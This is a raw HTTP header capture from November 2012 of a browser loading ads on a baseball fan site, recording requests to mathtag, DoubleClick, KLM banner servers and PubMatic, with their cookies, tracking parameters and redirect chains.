GET /notify/iframe?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkNaVE5DTlhsNU5IVkNXbkJIZERSeFZVUjJlVTVGL05UQmhPRE00Wm1ZdE9EaGpaaTFrWWpjeUxUQTBaR1l0TWpJM1pUZzNOR0poWXpJMC8xMzcxODU1ODE4MTc1NzQxNzU5LzIzOTUyNy8xNjM0ODEvNC8xeWpta2pqTFE3M0xIa3M0SGJPcTVwUlkwVnZDOUN6V3VBSkZ0UW1YaHZRLw/-Vx5IUcfiv-Q1yS4q6z-kjgOgfU&sid=163481&cid=239527&price=UKg6PgAPJjkKNCcytABRSv17RZSj9qvPC647cQ&3pck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DCinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ%26num%3D1%26sig%3DAOD64_2iizEPh4tOjZZ7lH3-JQYQbo8GUA%26client%3Dca-pub-7279410048024248%26adurl%3D HTTP/1.1

Host: bidder.mathtag.com
GET /notify/iframe?exch=adx&amp;id=5aW95q2jLzEvUTBGRlUwVkNaVE5DTlhsNU5IVkNXbkJIZERSeFZVUjJlVTVGL05UQmhPRE00Wm1ZdE9EaGpaaTFrWWpjeUxUQTBaR1l0TWpJM1pUZzNOR0poWXpJMC8xMzcxODU1ODE4MTc1NzQxNzU5LzIzOTUyNy8xNjM0ODEvNC8xeWpta2pqTFE3M0xIa3M0SGJPcTVwUlkwVnZDOUN6V3VBSkZ0UW1YaHZRLw/-Vx5IUcfiv-Q1yS4q6z-kjgOgfU&amp;sid=163481&amp;cid=239527&amp;price=UKg6PgAPJjkKNCcytABRSv17RZSj9qvPC647cQ&amp;3pck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DCinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ%26num%3D1%26sig%3DAOD64_2iizEPh4tOjZZ7lH3-JQYQbo8GUA%26client%3Dca-pub-7279410048024248%26adurl%3D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:39 GMT
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: uuid=50a83a3f-824c-494c-a6c1-8d21845c8673; domain=.mathtag.com; path=/; expires=Mon, 18 Nov 2013 01:30:39 GMT
Last-Modified: Sun, 18 Nov 2012 01:30:38 GMT
x-mm-dbg: won
Content-Length: 2480
x-mm-host: zrh-bidder-x7, ewr-bidder-x16
Server: MMBD/3.18.2
Connection: keep-alive
GET /adi/N3814.290927.AFFIPERF.COM19/B7153410.2;dcopt=anid;sz=728x90;ord=1371855818175741759;click=http://pixel.mathtag.com/click/img?mt_aid=1371855818175741759&mt_id=239527&mt_adid=100412&mt_uuid=50a83a3f-824c-494c-a6c1-8d21845c8673&mt_3pck=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DCinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ%26num%3D1%26sig%3DAOD64_2iizEPh4tOjZZ7lH3-JQYQbo8GUA%26client%3Dca-pub-7279410048024248%26adurl%3D&redirect= HTTP/1.1

Host: ad.doubleclick.net
GET /adi/N3814.290927.AFFIPERF.COM19/B7153410.2;dcopt=anid;sz=728x90;ord=1371855818175741759;click=http://pixel.mathtag.com/click/img?mt_aid=1371855818175741759&amp;mt_id=239527&amp;mt_adid=100412&amp;mt_uuid=50a83a3f-824c-494c-a6c1-8d21845c8673&amp;mt_3pck=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DCinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ%26num%3D1%26sig%3DAOD64_2iizEPh4tOjZZ7lH3-JQYQbo8GUA%26client%3Dca-pub-7279410048024248%26adurl%3D&amp;redirect= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bidder.mathtag.com/notify/iframe?exch=adx&amp;id=5aW95q2jLzEvUTBGRlUwVkNaVE5DTlhsNU5IVkNXbkJIZERSeFZVUjJlVTVGL05UQmhPRE00Wm1ZdE9EaGpaaTFrWWpjeUxUQTBaR1l0TWpJM1pUZzNOR0poWXpJMC8xMzcxODU1ODE4MTc1NzQxNzU5LzIzOTUyNy8xNjM0ODEvNC8xeWpta2pqTFE3M0xIa3M0SGJPcTVwUlkwVnZDOUN6V3VBSkZ0UW1YaHZRLw/-Vx5IUcfiv-Q1yS4q6z-kjgOgfU&amp;sid=163481&amp;cid=239527&amp;price=UKg6PgAPJjkKNCcytABRSv17RZSj9qvPC647cQ&amp;3pck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DCinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ%26num%3D1%26sig%3DAOD64_2iizEPh4tOjZZ7lH3-JQYQbo8GUA%26client%3Dca-pub-7279410048024248%26adurl%3D
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: text/html
Server: DCLK-AdSvr
Content-Length: 2106
Content-Encoding: gzip
Date: Sun, 18 Nov 2012 01:30:39 GMT
GET /adj/yb.fenwaywest/;chan1=mlb;rating=pg;dcopt=;yb=ad;s1=;s2=;tile=2;sz=160x600;ord=885814905? HTTP/1.1

Host: ad.doubleclick.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: DCLK-AdSvr
Content-Length: 272
Content-Encoding: gzip
Date: Sun, 18 Nov 2012 01:30:39 GMT
GET /AdServer/js/showad.js HTTP/1.1

Host: ads.pubmatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Expires: Sun, 18 Nov 2012 07:58:41 GMT
Last-Modified: Mon, 08 Oct 2012 11:29:02 GMT
Etag: &quot;1930978-5c3d-8741bb80&quot;
Cache-Control: max-age=172736, public
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;, CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Content-Length: 8128
Date: Sun, 18 Nov 2012 01:30:40 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /1585961/NO_b2c_A_728x90_nl_banner_131112_2012111308375744.swf?targetTag=_blank&clickTag=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3d31/7/23f/%252a/f%253B265055670%253B0-0%253B0%253B90677919%253B3454-728/90%253B51411577/51378850/1%253B%253B%257Esscs%253D%253fhttp%3A//pixel.mathtag.com/click/img%3Fmt_aid%3D1371855818175741759%26mt_id%3D239527%26mt_adid%3D100412%26mt_uuid%3D50a83a3f-824c-494c-a6c1-8d21845c8673%26mt_3pck%3Dhttp%253A//adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DCinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ%2526num%253D1%2526sig%253DAOD64_2iizEPh4tOjZZ7lH3-JQYQbo8GUA%2526client%253Dca-pub-7279410048024248%2526adurl%253D%26redirect%3Dhttp%3A//www.klm.com/travel/no_no/plan_and_book/special_offers/flight_offers/index.htm%3FWT.mc_id%3D1585961%7C7153410%7C90677919%7C265055670%7C1349429%7C51411577%26WT.tsrc%3Ddisplay%26 HTTP/1.1

Host: s0.2mdn.net
GET /1585961/NO_b2c_A_728x90_nl_banner_131112_2012111308375744.swf?targetTag=_blank&amp;clickTag=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3d31/7/23f/%252a/f%253B265055670%253B0-0%253B0%253B90677919%253B3454-728/90%253B51411577/51378850/1%253B%253B%257Esscs%253D%253fhttp%3A//pixel.mathtag.com/click/img%3Fmt_aid%3D1371855818175741759%26mt_id%3D239527%26mt_adid%3D100412%26mt_uuid%3D50a83a3f-824c-494c-a6c1-8d21845c8673%26mt_3pck%3Dhttp%253A//adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DCinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ%2526num%253D1%2526sig%253DAOD64_2iizEPh4tOjZZ7lH3-JQYQbo8GUA%2526client%253Dca-pub-7279410048024248%2526adurl%253D%26redirect%3Dhttp%3A//www.klm.com/travel/no_no/plan_and_book/special_offers/flight_offers/index.htm%3FWT.mc_id%3D1585961%7C7153410%7C90677919%7C265055670%7C1349429%7C51411577%26WT.tsrc%3Ddisplay%26 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3814.290927.AFFIPERF.COM19/B7153410.2;dcopt=anid;sz=728x90;ord=1371855818175741759;click=http://pixel.mathtag.com/click/img?mt_aid=1371855818175741759&amp;mt_id=239527&amp;mt_adid=100412&amp;mt_uuid=50a83a3f-824c-494c-a6c1-8d21845c8673&amp;mt_3pck=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DCinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ%26num%3D1%26sig%3DAOD64_2iizEPh4tOjZZ7lH3-JQYQbo8GUA%26client%3Dca-pub-7279410048024248%26adurl%3D&amp;redirect=
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Last-Modified: Tue, 13 Nov 2012 07:37:59 GMT
Date: Sun, 18 Nov 2012 01:30:40 GMT
Expires: Mon, 19 Nov 2012 01:30:40 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 12326
X-XSS-Protection: 1; mode=block
GET /AdServer/js/adTagInfo.html HTTP/1.1

Host: ads.pubmatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Expires: Sun, 18 Nov 2012 19:27:19 GMT
Last-Modified: Wed, 06 Jun 2012 12:18:01 GMT
Etag: &quot;19309cc-1493-c21cd040&quot;
Cache-Control: max-age=172800
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;, CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Content-Length: 1919
Date: Sun, 18 Nov 2012 01:30:40 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /010921/fontLoader.swf HTTP/1.1

Host: banners.klm.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: nginx/0.6.39
Date: Sun, 18 Nov 2012 01:30:40 GMT
Content-Length: 701
Last-Modified: Tue, 13 Nov 2012 14:10:39 GMT
Connection: keep-alive
Accept-Ranges: bytes
GET /fonts/ext_font/fontLib.swf HTTP/1.1

Host: banners.klm.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: nginx/0.6.39
Date: Sun, 18 Nov 2012 01:30:40 GMT
Content-Length: 77526
Last-Modified: Thu, 19 Jan 2012 19:28:26 GMT
Connection: keep-alive
Accept-Ranges: bytes
GET /AdServer/AdServerServlet?pubId=28596&siteId=28597&adId=24364&kadheight=600&kadwidth=160&inIframe=1&operId=3&kbgColor=498A72&ktextColor=191919&klinkColor=A60B1D&kltstamp=2012-11-18%202:30:40&timezone=1&screenResolution=1176x885&adPosition=-1x-1&frameName=http_fenwaywest_commediaindex_php_komli_ads_frame_0_28596_28597&pmUniAdId=top_0_0&ranreq=0.917069314550122&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&refurl=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

Host: showads.pubmatic.com
GET /AdServer/AdServerServlet?pubId=28596&amp;siteId=28597&amp;adId=24364&amp;kadheight=600&amp;kadwidth=160&amp;inIframe=1&amp;operId=3&amp;kbgColor=498A72&amp;ktextColor=191919&amp;klinkColor=A60B1D&amp;kltstamp=2012-11-18%202:30:40&amp;timezone=1&amp;screenResolution=1176x885&amp;adPosition=-1x-1&amp;frameName=http_fenwaywest_commediaindex_php_komli_ads_frame_0_28596_28597&amp;pmUniAdId=top_0_0&amp;ranreq=0.917069314550122&amp;pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;refurl=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:40 GMT
Server: Apache
Set-Cookie: PUBMDCID=3; domain=pubmatic.com; expires=Mon, 18-Nov-2013 01:30:40 GMT; path=/ KADUSERCOOKIE=7577C4DA-3995-4153-9A0B-7C9927BF1013; domain=pubmatic.com; expires=Mon, 18-Nov-2013 01:30:40 GMT; path=/ pubfreq_28597=; domain=pubmatic.com; expires=Tue, 20-Nov-2012 01:30:40 GMT; path=/ pubtime_28597=TMC; domain=pubmatic.com; expires=Mon, 19-Nov-2012 01:30:40 GMT; path=/ _curtime=1353202240; domain=pubmatic.com; expires=Sun, 18-Nov-2012 02:40:40 GMT; path=/ pubfreq_28597_24364_1667996297=243-1; domain=pubmatic.com; expires=Sun, 18-Nov-2012 02:10:40 GMT; path=/ PMDTSHR=cat:; domain=pubmatic.com; expires=Mon, 19-Nov-2012 01:30:40 GMT; path=/
X-ktk: ADS2016
Vary: Accept-Encoding
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
GET /AdServer/js/freq.html HTTP/1.1

Host: ads.pubmatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PUBMDCID=3; KADUSERCOOKIE=7577C4DA-3995-4153-9A0B-7C9927BF1013; pubfreq_28597=; pubtime_28597=TMC; _curtime=1353202240; pubfreq_28597_24364_1667996297=243-1; PMDTSHR=cat:
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 Apr 2012 09:34:29 GMT
Etag: &quot;19309ce-18b-e5963340&quot;
Accept-Ranges: bytes
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;, CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Content-Length: 247
Expires: Sun, 18 Nov 2012 01:30:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 18 Nov 2012 01:30:40 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /AdServer/js/syncuppixels.html?p=28596&s=28597 HTTP/1.1

Host: ads.pubmatic.com
GET /AdServer/js/syncuppixels.html?p=28596&amp;s=28597 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PUBMDCID=3; KADUSERCOOKIE=7577C4DA-3995-4153-9A0B-7C9927BF1013; pubfreq_28597=; pubtime_28597=TMC; _curtime=1353202240; pubfreq_28597_24364_1667996297=243-1; PMDTSHR=cat:
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Expires: Mon, 19 Nov 2012 06:42:23 GMT
Last-Modified: Thu, 15 Nov 2012 10:17:38 GMT
Etag: &quot;1930c5e-4136-f5e15480&quot;
Cache-Control: max-age=172800
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;, CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Content-Length: 4999
Date: Sun, 18 Nov 2012 01:30:40 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /AdServer/js/dppix.html?p=28596&s=28597&a=24364 HTTP/1.1

Host: ads.pubmatic.com
GET /AdServer/js/dppix.html?p=28596&amp;s=28597&amp;a=24364 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PUBMDCID=3; KADUSERCOOKIE=7577C4DA-3995-4153-9A0B-7C9927BF1013; pubfreq_28597=; pubtime_28597=TMC; _curtime=1353202240; pubfreq_28597_24364_1667996297=243-1; PMDTSHR=cat:
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Expires: Mon, 19 Nov 2012 05:32:04 GMT
Last-Modified: Thu, 15 Nov 2012 10:17:39 GMT
Etag: &quot;1930c6c-1fe7-f5f096c0&quot;
Cache-Control: max-age=172800
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;, CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Content-Length: 2845
Date: Sun, 18 Nov 2012 01:30:40 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /AdServer/js/cutildee6d705a5077f097c8c64e02d002b24.js HTTP/1.1

Host: ads.pubmatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/freq.html
Cookie: PUBMDCID=3; KADUSERCOOKIE=7577C4DA-3995-4153-9A0B-7C9927BF1013; pubfreq_28597=; pubtime_28597=TMC; _curtime=1353202240; pubfreq_28597_24364_1667996297=243-1; PMDTSHR=cat:
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 10 Jul 2012 09:55:27 GMT
Etag: &quot;1930a25-22c7-badbe1c0&quot;
Accept-Ranges: bytes
Cache-Control: max-age=90400000, public
Expires: Mon, 29 Oct 2012 20:40:44 GMT
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;, CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Content-Length: 2708
Date: Sun, 18 Nov 2012 01:30:40 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /AdServer/AdDisplayTrackerServlet?operId=1&pubId=28596&siteId=28597&adId=24364&adServerId=243&kefact=0.400000&kaxefact=0.400000&kadNetFrequecy=1&kadwidth=160&kadheight=600&kadsizeid=10&kltstamp=1353202240&indirectAdId=0&adServerOptimizerId=2&ranreq=0.917069314550122&kpbmtpfact=0.405375&carrierid=-1&campaignId=1336&creativeId=0&pctr=0.000000&wDSPByrId=230&imprCap=1&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: track.pubmatic.com
GET /AdServer/AdDisplayTrackerServlet?operId=1&amp;pubId=28596&amp;siteId=28597&amp;adId=24364&amp;adServerId=243&amp;kefact=0.400000&amp;kaxefact=0.400000&amp;kadNetFrequecy=1&amp;kadwidth=160&amp;kadheight=600&amp;kadsizeid=10&amp;kltstamp=1353202240&amp;indirectAdId=0&amp;adServerOptimizerId=2&amp;ranreq=0.917069314550122&amp;kpbmtpfact=0.405375&amp;carrierid=-1&amp;campaignId=1336&amp;creativeId=0&amp;pctr=0.000000&amp;wDSPByrId=230&amp;imprCap=1&amp;pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PUBMDCID=3; KADUSERCOOKIE=7577C4DA-3995-4153-9A0B-7C9927BF1013; pubfreq_28597=; pubtime_28597=TMC; _curtime=1353202240; pubfreq_28597_24364_1667996297=243-1; PMDTSHR=cat:
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:40 GMT
